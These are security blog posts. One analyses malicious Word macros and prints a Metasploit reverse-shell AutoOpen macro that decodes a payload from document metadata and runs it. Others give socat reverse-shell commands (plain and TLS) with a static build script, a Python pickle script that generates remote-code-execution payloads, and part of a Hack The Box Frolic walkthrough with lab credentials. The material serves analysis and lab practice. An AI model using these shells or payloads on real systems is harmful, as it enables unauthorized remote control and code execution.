    Set objNode = Nothing
    Set objXML = Nothing

End Function

Private Function DecodeBase64(ByVal strData As String) As Byte()

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
   
    ' help from MSXML
    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
   
    ' thanks, bye
    Set objNode = Nothing
    Set objXML = Nothing

End Function

Malicious actors may sometimes create their own implementation of certain functionality within the malware, this can be done for various reasons, one of them is because there is no simpler way to do this within the language or it could also be to obfuscate the code. It is also common for only decoders to be included within the code of the macro, specially in cases where the macro code doesn't need to encode any data.

Below is an obfuscated Base64 decoder that is found in a sample malware

Function QmFzZTY0X0RlY29kZQo(GYDozL, xbZuLutP)
    Dim VAIXQ,vgDKwiF,cWBqjCKwBl,CBnhtvROBWJf,VdNmpUUu,uOatMJ,GkdMVutOqmk,fqcaXNK,StBHym,NDXnaxDDQ,iXQiRtcgmWEUplc

    CBnhtvROBWJf = 2      
    VAIXQ = bGVuZ3RoCg(GYDozL)
    VdNmpUUu = 8
    uOatMJ = 16 * 4

    For cWBqjCKwBl = 1 To VAIXQ Step 4
        Dim zIlis,OaRRODd,WuFeJHdca,MmrJRSmq,EgnwkcNgcIgofn,dzYTBeK,xuRJndLZwLYPC,URJApvGRUMy,lpIcVNAjHiIgkw,ONOzKt,SdwnMSAxfcsNR

        zIlis = 3
        EgnwkcNgcIgofn = 0

        For OaRRODd = 0 To 3
            WuFeJHdca = Mid(GYDozL, cWBqjCKwBl + OaRRODd, 1)

            If WuFeJHdca = "=" Then
                zIlis = zIlis - 1
                MmrJRSmq = 0
            Else
                MmrJRSmq = InStr(1, xbZuLutP, WuFeJHdca, vbBinaryCompare) - 1
            End If

            EgnwkcNgcIgofn = 64 * EgnwkcNgcIgofn + MmrJRSmq
        Next

        EgnwkcNgcIgofn = Hex(EgnwkcNgcIgofn)
        EgnwkcNgcIgofn = String(6 - Len(EgnwkcNgcIgofn), "0") & EgnwkcNgcIgofn

        dzYTBeK = Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 1, 2))) + _
            Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 3, 2))) + _
            Chr(CByte("&H" & Mid(EgnwkcNgcIgofn, 5, 2)))

        vgDKwiF = vgDKwiF & Left(dzYTBeK, zIlis)
    Next

    QmFzZTY0X0RlY29kZQo = vgDKwiF
End Function

The function accepts two parameters:

GYDozL = Base64 encoded string
xbZuLutP = Alphanumeric string "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

There are also variables that are used as decoy, meaning that their values are never utilized after being assigned and this can also be done with functions, where multiple functions can be created, but never used or functions can be called but their output is never used.

Encoding is not used with security in mind, it's used with the idea of making commands not easily detectable or due to encoding conversion or when transferring data over the Internet not risking parts of the code being lost.

For this next sample code, the characters are moved over by 4 bytes, in a ROT13 style, and then the whole string is reversed.

Function aWhzZ2lI(a3JtdnhXaGloc2dySQ)
    Dim b As String, i As Long, a() As Byte, sh
    a = StrConv(a3JtdnhXaGloc2dySQ, vbFromUnicode)
    For i = 0 To UBound(a)
        a(i) = a(i) - 4
    Next i
    b = StrReverse(StrConv(a, vbUnicode))
    aWhzZ2lI = b
End Function

There is only one input parameter, which is the string that is encoded.

One way to analyze a function is to look at what parameters the functions are called with and what output they return, it is still important to look for any calls that may execute any commands outside of the code or Office document.

Renaming Functions

Given that VBA doesn't have the possibility to rename functions, like languages like JavaScript allows, a workaround is to create a function that simply returns the value that the other function returns.

In this example, to obfuscate the function Len, a function is created with a random string of characters.

Function bGVuZ3RoCg(c3RyaW5nCg)
    bGVuZ3RoCg = Len(c3RyaW5nCg)
End Function

Document Analysis

This section shows a quick analysis of a Word document. Microsoft Office documents that have a macro embedded receive an extension that ends with the letter m, though this can be changed.

The first step is to check the contents of the archive, the 7-zip utility can be used for this task

❯ 7z l Doc5.docm

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz (806E9),ASM,AES-NI)

Scanning the drive for archives:
1 file, 26568 bytes (26 KiB)

Listing archive: Doc5.docm

--
Path = Doc5.docm
Type = zip
Physical Size = 26568

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
1980-01-01 00:00:00 .....         1585          413  [Content_Types].xml
1980-01-01 00:00:00 .....          590          239  _rels/.rels
1980-01-01 00:00:00 .....         4526         1557  word/document.xml
1980-01-01 00:00:00 .....         1081          301  word/_rels/document.xml.rels
1980-01-01 00:00:00 .....        27648        10834  word/vbaProject.bin
1980-01-01 00:00:00 .....         8393         1746  word/theme/theme1.xml
1980-01-01 00:00:00 .....          277          191  word/_rels/vbaProject.bin.rels
1980-01-01 00:00:00 .....         2474          609  word/vbaData.xml
1980-01-01 00:00:00 .....         3194         1105  word/settings.xml
1980-01-01 00:00:00 .....          241          155  customXml/item1.xml
1980-01-01 00:00:00 .....          341          225  customXml/itemProps1.xml
1980-01-01 00:00:00 .....        29364         2924  word/styles.xml
1980-01-01 00:00:00 .....          803          313  word/webSettings.xml
1980-01-01 00:00:00 .....         1567          502  word/fontTable.xml
1980-01-01 00:00:00 .....          991          572  docProps/core.xml
1980-01-01 00:00:00 .....         1041          524  docProps/app.xml
1980-01-01 00:00:00 .....          296          194  customXml/_rels/item1.xml.rels
------------------- ----- ------------ ------------  ------------------------
1980-01-01 00:00:00              84412        22404  17 files

The fact that there is a vbaProject.bin.rels file confirms that there is a macro present within the document, this could be a red flag if there is no expectation of a macro being embedded within the document. Further analysis should be carried out in order to determine if the code is malicious or not.

Extracting Macro Source Code

There are tools that are able to extract source code from the document, such as oledump. This tool can be used to analyze the document.

❯ oledump Doc5.docm
A: word/vbaProject.bin
 A1:       412 'PROJECT'
 A2:        71 'PROJECTwm'
 A3: M    7836 'VBA/NewMacros'
 A4: m    1135 'VBA/ThisDocument'
 A5:      5028 'VBA/_VBA_PROJECT'
 A6:      3195 'VBA/__SRP_0'
 A7:       340 'VBA/__SRP_1'
 A8:      3399 'VBA/__SRP_2'
 A9:       366 'VBA/__SRP_3'
A10:       348 'VBA/__SRP_4'
A11:       106 'VBA/__SRP_5'
A12:       571 'VBA/dir'

The output above shows multiple objects that are identified by the A code at the start of the line and can be easily extracted with the following command

oledump Doc5.docm -v -s A3

This would output the object A3, which is the source code of the macro that is contained within the document, this is also identified by the capital M found on the first output.

Not all macros will execute upon loading the document in an Office program, this can be done to avoid automatic analysis with sandbox tools. The function autoopen would be used for those documents that do execute the code upon opening, the following code is an example of this case

Sub autoopen()
  MsgBox ("hello world")
End Sub

After the code is extracted, it should be analyzed to determine what is useful and what can be safely discarded. Look for aspect where the code carries out possible dangerous commands and if they can be safely replaced to output to a message box or terminal, instead of executing other commands.

Tool olevba

Another tool to extract the source code is olevba, below is the sample document being analyzed with this tool

❯ olevba Doc5.docm
olevba 0.55.1 on Python 3.8.3 - http://decalage.info/python/oletools
===============================================================================
FILE: Doc5.docm
Type: OpenXML
Error: [Errno 2] No such file or directory: 'word/vbaProject.bin'.
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO NewMacros.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[..SOURCE CODE..]
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|vbHide              |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Chr                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|StrReverse          |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
+----------+--------------------+---------------------------------------------+

An advantage of this tool is that it provides some parts of the code that are often used in malicious macro codes, which can be an initial step to determining whether the macro might be malicious or not and a starting point on what to check.

Extracting Metadata

In newer Office documents, the metadata is stored in a file called core.xml and can be viewed with the command xmllint

xmllint --format core.xml

The output is formatted and can be easily read



  JXZzaiRrc[..SNIP..]SR3bWxY
  
  Document Author
  WW91J3JlIGluIHR[..SNIP..]XJkZXIh
  gWpoNDZoPTZqNzlpPTE5O2l[..SNIP..]HBpbHd2aXtzdA
  Document Author
  7
  2020-07-16T00:41:00Z
  2020-07-16T00:55:00Z

There are a couple of encoded strings visible and the macro makes reference to the metadata. Having encoded strings in the metadata can also be a red flag, these can often contain other data that the macro needs, such as having URL or IP addresses of where to download another stage. Decoding them can provide more details, though it may be possible that multiple encodings are used.

Metasploit Reverse Shell

This is a reverse shell macro that was created using Metasploit, this is a good beginner sample that can be used to practice analysis of malware documents. This section is a walkthrough of how to check this document.

First checking the file using oledump shows the following output

A: word/vbaProject.bin
 A1:       385 'PROJECT'
 A2:        71 'PROJECTwm'
 A3: M    5871 'VBA/NewMacros'
 A4: m    1073 'VBA/ThisDocument'
 A5:      4400 'VBA/_VBA_PROJECT'
 A6:       734 'VBA/dir'

When extracting the content of the object A3, this is the object that is checked as it has the letter M and this is used by the oledump tool to denote macro code.

Attribute VB_Name = "NewMacros"
Public Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long

Sub AutoOpen()
    On Error Resume Next
    Dim found_value As String

    For Each prop In ActiveDocument.BuiltInDocumentProperties
        If prop.Name = "Comments" Then
            found_value = Mid(prop.Value, 56)
            orig_val = Base64Decode(found_value)
            #If Mac Then
                ExecuteForOSX (orig_val)
            #Else
                ExecuteForWindows (orig_val)
            #End If
            Exit For
        End If
    Next
End Sub

Sub ExecuteForWindows(code)
    On Error Resume Next
    Set fso = CreateObject("Scripting.FileSystemObject")
    tmp_folder = fso.GetSpecialFolder(2)
    tmp_name = tmp_folder + "\" + fso.GetTempName() + ".exe"
    Set f = fso.createTextFile(tmp_name)
    f.Write (code)
    f.Close
    CreateObject("WScript.Shell").Run (tmp_name)
End Sub

Sub ExecuteForOSX(code)
    System ("echo """ & code & """ | python &")
End Sub


' Decodes a base-64 encoded string (BSTR type).
' 1999 - 2004 Antonin Foller, http://www.motobit.com
' 1.01 - solves problem with Access And 'Compare Database' (InStr)
Function Base64Decode(ByVal base64String)
  'rfc1521
  '1999 Antonin Foller, Motobit Software, http://Motobit.cz
  Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
  Dim dataLength, sOut, groupBegin
  
  base64String = Replace(base64String, vbCrLf, "")
  base64String = Replace(base64String, vbTab, "")
  base64String = Replace(base64String, " ", "")
  
  dataLength = Len(base64String)
  If dataLength Mod 4 <> 0 Then
    Err.Raise 1, "Base64Decode", "Bad Base64 string."
    Exit Function
  End If

  
  For groupBegin = 1 To dataLength Step 4
    Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut
    numDataBytes = 3
    nGroup = 0

    For CharCounter = 0 To 3

      thisChar = Mid(base64String, groupBegin + CharCounter, 1)

      If thisChar = "=" Then
        numDataBytes = numDataBytes - 1
        thisData = 0
      Else
        thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1
      End If
      If thisData = -1 Then
        Err.Raise 2, "Base64Decode", "Bad character In Base64 string."
        Exit Function
      End If

      nGroup = 64 * nGroup + thisData
    Next
    
    nGroup = Hex(nGroup)
    
    nGroup = String(6 - Len(nGroup), "0") & nGroup
    
    pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 3, 2))) + _
      Chr(CByte("&H" & Mid(nGroup, 5, 2)))
    
    sOut = sOut & Left(pOut, numDataBytes)
  Next

  Base64Decode = sOut
End Function

The source code on this instance is not obfuscated, which makes it easier to analyze, and there is a check for the OS that is running so that different commands are used. There is a reference to the Comments property that is found in the metadata.

Checking the core.xml file it shows a big block of data in the description field



  
  
  
  
  TVqQAAMAAA[...]GFiLnBkYgA=
  Wei Chen
  1
  2017-05-25T19:12:00Z
  2017-05-25T19:28:00Z

The long string is encoded using Base64, when decoding the data it results in a binary file.

Checking the Windows executable with Radare2 shows the following

❯ r2 msf.dat
[0x00407354]> i
fd       3
file     msf.dat
size     0x1204a
humansz  72.1K
mode     r-x
format   pe
iorw     false
blksz    0x0
block    0x100
type     EXEC (Executable file)
arch     x86
baddr    0x400000
binsz    73802
bintype  pe
bits     32
canary   false
retguard false
class    PE32
cmp.csum 0x000125dd
compiled Tue Apr 14 04:46:43 2009
crypto   false
dbg_file C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb
endian   little
havecode true
hdr.csum 0x00000000
guid     4AC180361
laddr    0x0
lang     c
linenum  true
lsyms    true
machine  i386
maxopsz  16
minopsz  1
nx       false
os       windows
overlay  true
cc       cdecl
pcalign  0
pic      false
relocs   true
signed   false
sanitiz  false
static   false
stripped false
subsys   Windows GUI
va       true

The binary analysis of this is out of the scope of this documentation, however, it establishes a reverse shell back to the attacker.

SOCAT

Fri, 08 Oct 2021 22:56:24 +0000

There are several commands and tools that can be used to establish a shell connection between hosts, on that is very useful in multiple ways is socat. There are several benefits to using socat over netcat, one being the ability of stabilizing the shell from the start and not having to run through a sequence of commands to do so. The only downside to this tool is that it requires the binary to exist in both ends, which might not be common in many cases, but can be easy to move the binary to the target system and start a better reverse shell.

This post covers establishing a shell session between two hosts in Windows and Linux environments, these are the commands I use when working on a Hack The Box machine when I want to use socat. It also covers compiling the binaries for Linux and Windows.

The same code is used for the binaries in either environment, the advantage of this is being able to use the same commands regardless of the environment and not having to remember the difference between one and the other, beside the program being used as the shell.

Reverse Shell Session

A listener can be started with the following command, which has the advantage of creating a stable shell without needing to run additional commands

socat file:`tty`,raw,echo=0 tcp4-listen:9000

If the listener is started in a Windows environment, then use the following command to start the listener, though not as stable as the command above

socat tcp4-listen:9000 stdout

On the target host, the reverse shell is started with the command below

socat exec:'/usr/bin/bash -li',pty,stderr,setsid,sigint,sane tcp4:0.0.0.0:9000

Change the IP address 0.0.0.0 to the respective address, on the listening side it binds the connection to a specific address and on the target host it establishes the connection to the attacker's host.

Despite the shell being more stable from the start, it may be necessary to set the dimensions of the STTY and the TERM environment variable to further stabilize the shell and prevent artifacts from showing up in the output. If the target system is running Linux, then simply set the TERM environment variable to the terminal being used, since I use xterm, I run the command export TERM=xterm-256color.

Setting the terminal dimensions can be done by first running the command stty size on the local system and then setting the terminal dimensions on the reverse shell with the command stty rows 80 cols 124, just replace the values as necessary.

The command below can be executed on the local system to generate the necessary commands and just need to copy from the terminal on the local system and paste on the reverse shell session

stty size | awk '{printf "stty rows " $1 " cols " $2}';printf ";export TERM=$TERM"

The above steps only apply when both systems are running a Unix-based system and not when it's a Windows system.

TLS Encryption

Starting an encrypted connection can also be done with the use of a SSL certificate, the commands below are used to create the certificate

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 30 -nodes
cat key.pem cert.pem > single.pem

Start the listener with the command below

socat file:`tty`,raw,echo=0 openssl-listen:9000,cert=single.pem,verify=0

On the target host, the following command can be used to initiate the reverse shell

socat exec:'/usr/bin/bash -li',pty,stderr,setsid,sigint,sane openssl:0.0.0.0:9000,verify=0

Compile Socat

The socat binary can be statically compiled so that it can be uploaded to a target Linux host and used to establish a reverse shell. Compilation is done within a container to prevent having to install any additional tools.

The following build.sh script is used for the compilation, check for the latest versions of each of the packages needed for the compilation process

#!/bin/bash

set -e
set -o pipefail
set -x

# Check for the latest versions of these packages
SOCAT_VERSION=1.7.4.1
NCURSES_VERSION=6.2
READLINE_VERSION=8.1
OPENSSL_VERSION=1.1.1k

function build_ncurses() {
    cd /build

    # Download
    curl -LO http://invisible-mirror.net/archives/ncurses/ncurses-${NCURSES_VERSION}.tar.gz
    tar zxvf ncurses-${NCURSES_VERSION}.tar.gz
    cd ncurses-${NCURSES_VERSION}

    # Build
    CC='/usr/bin/gcc -static' CFLAGS='-fPIC' ./configure \
        --disable-shared \
        --enable-static
}

function build_readline() {
    cd /build

    # Download
    curl -LO ftp://ftp.cwru.edu/pub/bash/readline-${READLINE_VERSION}.tar.gz
    tar xzvf readline-${READLINE_VERSION}.tar.gz
    cd readline-${READLINE_VERSION}

    # Build
    CC='/usr/bin/gcc -static' CFLAGS='-fPIC' ./configure \
        --disable-shared \
        --enable-static
    make -j4

    # Note that socat looks for readline in , so we need
    # that directory to exist.
    ln -s /build/readline-${READLINE_VERSION} /build/readline
}

function build_openssl() {
    cd /build

    # Download
    curl -LO https://www.openssl.org/source/openssl-${OPENSSL_VERSION}.tar.gz
    tar zxvf openssl-${OPENSSL_VERSION}.tar.gz
    cd openssl-${OPENSSL_VERSION}

    # Configure
    CC='/usr/bin/gcc -static' ./Configure no-shared no-async linux-x86_64

    # Build
    make -j4
    echo "** Finished building OpenSSL"
}

function build_socat() {
    cd /build

    # Download
    curl -LO http://www.dest-unreach.org/socat/download/socat-${SOCAT_VERSION}.tar.gz
    tar xzvf socat-${SOCAT_VERSION}.tar.gz
    cd socat-${SOCAT_VERSION}

    # Build
    # NOTE: `NETDB_INTERNAL` is non-POSIX, and thus not defined by MUSL.
    # We define it this way manually.
    CC='/usr/bin/gcc -static' \
        CFLAGS='-fPIC' \
        CPPFLAGS="-I/build -I/build/openssl-${OPENSSL_VERSION}/include -DNETDB_INTERNAL=-1" \
        LDFLAGS="-L/build/readline-${READLINE_VERSION} -L/build/ncurses-${NCURSES_VERSION}/lib -L/build/openssl-${OPENSSL_VERSION}" \
        ./configure
    make -j4
    strip socat
}

function doit() {
    build_ncurses
    build_readline
    build_openssl
    build_socat

    # Copy to output
    if [ -d /output ]
    then
        OUT_DIR=/output/`uname | tr 'A-Z' 'a-z'`/`uname -m`
        mkdir -p $OUT_DIR
        cp /build/socat-${SOCAT_VERSION}/socat $OUT_DIR/
        echo "** Finished **"
    else
        echo "** /output does not exist **"
    fi
}

doit

The following Dockerfile is used to create the container that will be used for compilation

FROM docker.io/alpine:latest
MAINTAINER Andrew Dunham 

RUN apk --update add build-base bash automake git curl linux-headers

RUN mkdir /build
RUN mkdir /output
ADD . /build

# This builds the program and copies it to /output
CMD /build/build.sh

Create the container with the command below, the files mentioned above should exist within the same directory

podman build -t socat-static .

Run the following command to start the container and compile the socat binary

podman run -v $PWD:/output --rm localhost/socat-static

The successful compilation will result in the path ./linux/x86_64/socat being created and containing the statically linked binary for 64-bit Linux systems.

To compile for 32-bit, the build.sh needs to be modified in the function build_openssl, the configure line should read CC='/usr/bin/gcc -static' ./Configure no-shared no-async linux-x86 to compile OpenSSL library in 32-bit. The container needs to be created with the command podman build -t socat-static-32 --arch=386 . to create the container with 32-bit architecture. The container is then started with the command podman run -v $PWD:/output --rm localhost/socat-static-32. The output will still be saved to the directory ./linux/x86_64, thus will overwrite any existing file with the name socat.

The 32-bit version will also work in the 64-bit system.

Compile for Windows

To compile in Windows, the follow the steps below

Install Cygwin with the Development packages.
Download the tarball from the URL http://www.dest-unreach.org/socat/download/socat-1.7.4.1.tar.gz and untar within Cygwin.
Run the command ./configure and then make

The following list of libraries need to be copied along with the executable to run Socat in any Windows system, simply place the libraries in the same folder as the executable

cyggcc_s-1.dll
cygcrypto-1.1.dll
cygncursesw-10.dll
cygreadline7.dll
cygssl-1.1.dll
cygwin1.dll
cygz.dll

The libraries are found within the Cygwin bin folder.

Python Pickles

Thu, 30 Sep 2021 17:50:39 +0000

In Python, an object can be converted into a stream of bytes to allow for moving the object between environments or processes, this is known as serialization and deserialization. The Pickle library can be used in Python for this purpose, however, this is an insecure method that can allow an attacker to obtain remote code execution (RCE) on the target host.

The documentation includes a warning that points to this situation and pointing to the serialized data being processed only for trusted sources

Warning: The pickle module is not secure. Only unpickle data you trust. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling.

There is a difference between how the object is serialized in Python 2 and Python 3, which can present an issue when dealing with applications that use the deprecated Python 2 version. However, the Pickle library in Python 3 is capable of generating a Python 2 compatible serialized object that can be used to generate the payload for these scenarios.

The following Python 3 script creates a serialized object

#!/usr/bin/env python3

import os
import pickle

class RCE(object):
    def __init__(self,cmd):
        self.cmd = cmd
    
    def __reduce__(self):
        return (os.system, (self.cmd,))

print(pickle.dumps(RCE(b"uname -a")))

The output of the script above is shown below

\x80\x04\x95#\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94C\x08uname -a\x94\x85\x94R\x94.

The latest version of the protocol is 5, however, in Python 3.8 the default version of the protocol used is 4. This can be checked with pickle.DEFAULT_PROTOCOL and the highest protocol version available can be checked with pickle.HIGHEST_PROTOCOL. The output shown above is for protocol version 4, however, it would be the same if it was version 5.

Below is the output of each protocol version for the same object mentioned in the script above

0: cposix\nsystem\np0\n(c_codecs\nencode\np1\n(Vuname -a\np2\nVlatin1\np3\ntp4\nRp5\ntp6\nRp7\n.
1: cposix\nsystem\nq\x00(c_codecs\nencode\nq\x01(X\x08\x00\x00\x00uname -aq\x02X\x06\x00\x00\x00latin1q\x03tq\x04Rq\x05tq\x06Rq\x07.
2: \x80\x02cposix\nsystem\nq\x00c_codecs\nencode\nq\x01X\x08\x00\x00\x00uname -aq\x02X\x06\x00\x00\x00latin1q\x03\x86q\x04Rq\x05\x85q\x06Rq\x07.
3: \x80\x03cposix\nsystem\nq\x00C\x08uname -aq\x01\x85q\x02Rq\x03.
4: \x80\x04\x95#\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94C\x08uname -a\x94\x85\x94R\x94.
5: \x80\x05\x95#\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94C\x08uname -a\x94\x85\x94R\x94.

The protocol versions 0 through 2 can be deserialized by Python 2, while the versions 3 through 5 can only be deserialized by Python 3. This aspect is important, since if the target application uses an older version of Python, then it is necessary to adjust the script to generate the respective payload.

Specifying which protocol version to use can be done by adding the number after the object in the dumps function or by using the protocol= argument, as shown below

pickle.dumps(RCE(b"uname -a"), 1)
pickle.dumps(RCE(b"uname -a"), protocol=1)

The other argument that will generate a different serialized object is fix_imports=, which will translate the module names in the serialized object when the version is lower than 3 so that they match the module names on Python 2. However, this may cause for the module name to not match the one used on the target system, meaning that it may be necessary to set this argument to False. In the sample output above, this was not needed as the same module name was used, however, in the sample below the output does vary due to the module being named differently

Fixed import: ccommands\nPopen\np0\n(Vuname -a\np1\ntp2\nRp3\n.
Not fixed import: csubprocess\nPopen\np0\n(Vuname -a\np1\ntp2\nRp3\n.

The only difference being the module name subprocess being changed to commands. If the protocol version is set to 3 or higher, the fix_imports= argument doesn't have any effect on the output.

The loads function will determine the protocol version prior to deserializing the data provided, this means that when attempting to exploit a vulnerable application, start lowering the version of the protocol if the payload fails and include the fix_imports argument as part of the testing as well.

Frolic

Thu, 30 Sep 2021 14:32:36 +0000

This is another Hack The Box machine that has a web application that has a vulnerability that allows for remote code execution (RCE). There's also a privilege escalation that is achived through a stack buffer overflow and using return oriented programming (ROP) technique.

For the reverse engineering part of the machine, Radare2 is used to analyze the binary and locate all of the necessary aspects.

Credentials

These are credentials found in different parts of the host

admin : imnothuman
admin : superduperlooperpassword_lol
admin : idkwhatispass

Port Scan

There are 5 open ports that were found:

22/tcp OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
139/tcp Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
445/tcp Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1880/tcp Node.js (Express middleware)
9999/tcp nginx 1.10.3 (Ubuntu)

The Samba service is not exposing any shares that can provide more information. Further checking the website found on port 9999/tcp.

Website

Accessing the on port 9999/tcp shows the default nginx installation page and points to the domain frolic.htb and pointing to the port 1880/tcp, however, that port only shows a Node-RED login and no credentials.

Running a ffuf scan with the command ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://frolic.htb:9999/FUZZ -o scans/ffuf.9999.json -c -ic -v -r -replay-proxy http://127.0.0.1:8080 shows the following relevant results

http://frolic.htb:9999/admin
http://frolic.htb:9999/backup
http://frolic.htb:9999/dev
http://frolic.htb:9999/test
http://frolic.htb:9999/loop

Upon further investigation on those URLs, the only relevant ones are

http://frolic.htb:9999/admin
http://frolic.htb:9999/backup

The backup directory points to two plain text files that contain credentials.

The admin page shows a login form and the JavaScript found at the URL http://frolic.htb:9999/admin/js/login.js contains the credentials in clear text

var attempt = 3; // Variable to count number of attempts.
// Below function Executes on click of login button.
function validate(){
var username = document.getElementById("username").value;
var password = document.getElementById("password").value;
if ( username == "admin" && password == "superduperlooperpassword_lol"){
alert ("Login successfully");
window.location = "success.html"; // Redirecting to other page.
return false;
}
else{
attempt --;// Decrementing by one.
alert("You have left "+attempt+" attempt;");
// Disabling fields after 3 attempts.
if( attempt == 0){
document.getElementById("username").disabled = true;
document.getElementById("password").disabled = true;
document.getElementById("submit").disabled = true;
return false;
}
}
}

It also points to the page http://frolic.htb:9999/admin/success.html that contains the following Ook code, which is a rewrite of brainfuck.

..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... .....
..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... .....
....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! .....
..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
!!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... .....
..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?.
?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... .....
..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... .....
..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!!
!.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!!
!!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?!
.?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?..
!.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?.
?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.?
!!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!!
!.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!!
!.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. .....
..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!!
!!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!!
!!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .....
..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! .....
..!.! !!!!! !.?.

After decoding the message Nothing here check /asdiSIAJJ0QWE9JAS is obtained, the last part is another page within the website.

The page that is found in the URL http://frolic.htb:9999/asdiSIAJJ0QWE9JAS/ contains a Base64 encoded string

UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB
BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs
K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve
EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj
lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC
AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG
AAAAAAEAAQBPAAAAAwEAAAAA

The encoded string is downloaded and decoded with the command curl http://frolic.htb:9999/asdiSIAJJ0QWE9JAS/ | base64 -d | xxd and shows that it's a binary file

504b0304140009000800c389374d23fe5b14b00000006902000009001c00
696e6465782e7068705554090003857ca75b857ca75b75780b0001040000
000004000000005e44e6104a9f73b2688a299a1b9550f06e0ba9bf5373e4
024a771a11dc8ee5a034e2f6d98f6bee7ad0128a55c896ec2b58ba7fe050
c8e112e1b687a4ead0bbe2785f13c04e895bfd8d8453aaea38f283f2e20f
914a3253c72a830344d08d7d933864540e51026bde10cad7e3e4fb6a5f9f
8bf918e994c027787f6390c216dd8f74beb2373551ac0b9a8a030e95106b
032c34b5d96229be3446b5e90609ffba84e396eae9efc72671326f8857d4
9ce339504b070823fe5b14b000000069020000504b01021e031400090008
00c389374d23fe5b14b000000069020000090018000000000001000000a4
8100000000696e6465782e7068705554050003857ca75b75780b00010400
0000000400000000504b050600000000010001004f000000030100000000

